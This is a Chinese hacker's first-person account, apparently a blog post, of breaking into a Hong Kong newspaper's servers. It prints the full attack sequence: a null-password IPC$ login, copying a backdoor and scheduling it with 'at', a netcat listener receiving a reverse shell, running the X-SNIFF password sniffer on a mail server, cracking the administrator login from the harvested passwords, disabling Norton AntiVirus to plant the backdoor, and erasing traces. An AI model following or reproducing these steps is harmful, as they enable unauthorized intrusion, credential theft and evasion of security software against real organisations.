一次透过SNIFF有目的性的入侵

一次透过SNIFF有目的性的入侵

所用武器：流光，SUPERSCAN3，HDOOR，NETCAT，3389客户端，X-SNIFF

宿舍装了ADSL，我疯狂地在网上看电影和在QQ里泡MM（也可能是恐龙吧 🙁 ）。网络入侵和安全方面的学习已经荒废了好一段时间 🙁 ,忽然觉得良心发现，是时候回到学习的位置上了，先找些机器入侵热身一下吧！:) 刚好正在浏览一个香港某日报的网站www.target.com.hk（名字已改），就那你开刀吧！

首先ping一下对方的主机拿到IP地址为202.2.*.1，然后架起superscan3对目标进行初探，得到以下结果：

* 202.2.*.1 www1

|___ 25 Simple Mail Transfer

|___ 220 ok RsProxyServer Ready..

|___ 80 World Wide Web HTTP

|___ HTTP/1.1 200 OK..Server: Microsoft-IIS/5.0..Content-Location: http://202.2.*.1/Default.htm..Date: Fri, 03 Jan 2003 17:24:28 GM

|___ 110 Post Office Protocol – Version 3

|___ 135 DCE endpoint resolution

|___ 139 NETBIOS Session Service

|___ 389 Lightweight Directory Access Protocol

|___ 445 windows-nb

|___ 1433 Microsoft-SQL-Server

|___ 3389 windows–T

看来可下手的地方有四个：80，139，1433，3389。先看看有没有输入法漏洞吧。登陆一看，失望！只有E文输入法。心想也是，一个服务器难道还需要什么中文输入法让人上ICQ吗？3389没戏！跟着用流光的高级扫描功能针对CGI/ASP，IIS，IPC，PLUGINS扫描一下，希望对方是个笨管理员，没有为机器打补丁有NULL.PRINTER等致命的漏洞或者存在弱口令。结果再一次失望，没有可以让我利用的漏洞！看来网管还挺尽责的（TNND）。剩下1433了，愿主保佑吧！用SQL2等对目标进行溢出，结果还是无功而返。难道真的要让我试分析他的网页CGI结构，找突破口吗？我可没有那么高手和没那个耐力！有点沮丧……有点想放弃……郁闷ing……

一间报社不可能就一台服务器吧！不管那么多，用流光的简单探测模式扫他的C类网。结果还真的有一点点惊喜！202.2.*.18的administrator竟然是空口令！:) 不管三七二十一控制了他再说！

Microsoft Windows 2000 [Version 5.00.2195]

(C) 版权所有 1985-2000 Microsoft Corp.

D:\\>net use \\\\202.2.*.18\\ipc$ "" /user:"administrator"

命令成功完成。（可能你会问为什么不用流光的种植者呢？流光用多了会使人变懒！还是用命令有成就感）

D:\\hack\\bd\\HDoor>copy nhdoor.exe \\\\202.2.*.18\\admin$\\system32\\nhdoor.exe

已复制 1 个文件。

D:\\hack\\bd\\HDoor>net time \\\\202.2.*.18

\\\\202.2.*.18 的当前时间是 2002/12/21 上午 02:05

命令成功完成。

D:\\hack\\bd\\HDoor>at \\\\202.2.*.18 02:07 nhdoor.exe

新加了一项作业，其作业 ID = 1

D:\\hack\\bd\\HDoor>net use \\\\202.2.*.18 /del

\\\\202.2.*.18 已经删除。

现在剩下的只有等待了………………

然后开两个命令提示符，一个用NC监听53端口等目标进行反向连接：D:\\hack\\nc>nc -l -vv -p 53 ；另一个则用来激活目标主动连过来：D:\\>ping 202.2.83.*.18 -l 101 -n 1

Yahoo!有反应了

D:\\hack\\nc>nc -l -vv -p 53

listening on [any] 53 …

Warning: forward host lookup failed for SKYMAIL_MX3: h_errno 11001: HOST_NOT_FOU

ND

connect to [218.15.1.157] from SKYMAIL_MX3 [202.2.*.18] 1352: HOST_NOT_FOUND

-> HUC HDoor Control Password: ******** （密码当然不能看！）

-> Welcome and have a good luck! 🙂

============================== Ping BackDoor V0.41 ============================

=============== Code by Lion. Welcome to http://www.cnhonker.com ==============

<C:\\WINNT\\system32@skymail_mx3>#

拿到SHELL后当然是在机器里参观一下，收集需要的信息。经过一番窥探以后，确定这是一台邮件服务器和Secondary WINS Server。跟着进入苦思阶段，要怎样才能把之前的202.2.*.1拿下来呢？Sniff!没错！这是台邮件服务器，嗅探进出的数据，把登陆者的帐户和密码过滤出来，希望202.2.*.1的管理员会通过这邮件服务器收发邮件。马上用NET命令把XSNIFF上传上去，运行XSNIFF -PASS -HIDE -LOG PASS.LOG。现在只有等待了，擦掉脚印走人，睡觉！

十几天过去了，登陆上202.2.*.18把PASS.LOG拿下来。呵呵，收集到的信息还挺多的！:) 但不知道有没有收集到202.2.*.1的管理员的信息。我把收集到的邮件帐号、帐户名、密码做成了一部字典，然后用流光对准202.2.*.1的139跑。我的努力果然没白费，密码拿到了，是 b3JhY2xl 幸亏我当时没有头脑发热去对他暴力破解，不然…… 🙁

最后当然是放后门，保护胜利成果。

Microsoft Windows 2000 [Version 5.00.2195]

(C) 版权所有 1985-2000 Microsoft Corp.

D:\\>net use \\\\202.2.*.1\\ipc$ "b3JhY2xl" /user:"administrator"

命令成功完成。

D:\\hack\\bd\\HDoor>copy nhdoor.exe \\\\202.2.*.1\\admin$\\system32\\nhdoor.exe

已复制 1 个文件。

D:\\hack\\bd\\HDoor>net time \\\\202.2.*.1

\\\\202.2.*.1 的当前时间是 2003/1/3 上午 01:17

命令成功完成。

D:\\hack\\bd\\HDoor>at \\\\202.2.*.1 01:19 nhdoor.exe

新加了一项作业，其作业 ID = 1

跟着用NETCAT等待他主动连过来。奇怪！没反应！心想可能是HDOOR不行吧，换个ICMD后门试试，也不行，TELNET不上去！郁闷ing……接着连上他的3389看一下。奇怪！在SYSTEM32里面没有我刚才所复制的文件，但刚才明明提示说已复制啊！然后我用net use k: \\\\202.2.*.1\\admin$\\system32把SYSTEM32影射为K盘，直接进行复制粘贴，奇怪，明明粘贴过去了，但K盘却没有复制过去的文件，百思不得其解。算了，反正拿到administrator的密码，算完成任务了。接着又连上3389，在他那里四处逛逛，看有什么好玩的，打开事件查看器看了一下，在应用程序日记里最前有几条错误，来源是Norton AntiVirus，引起了我的注意！打开描述一看，是说发现了病毒并删除掉，而文件名就是我COPY的那些！看来迷团解开了，我马上在服务管理里把Norton AntiVirus Client停掉，然后像之前那样把nhdoor复制过去，OK！我的nhdoor在SYSTEM32里面出现了！:)

最后当然是启动后门，擦脚印（可恨的是Norton里的病毒日记不知道怎样删掉，到时候被管理员发现就惨啦！）

事后总结：

这一次入侵，觉得应该还有其他方法对目标机器进行入侵（等我实验成功后再写出来）。这次入侵的关键突破口就是管理员的邮箱密码与登陆密码相同。对于大多数的人来说凡是需要密码的地方都会用同一个密码，这样是不可取的，这样就会造成城门失火秧及池渔。还有就是在停掉Norton AntiVirus Client时，如果对方没有开3389的话，可以自己写一个.bat文件copy过去用AT加任务运行，把Norton AntiVirus Client停掉，因为

Norton只对病毒有效，而.bat是自己写的，当然不是什么病毒啦！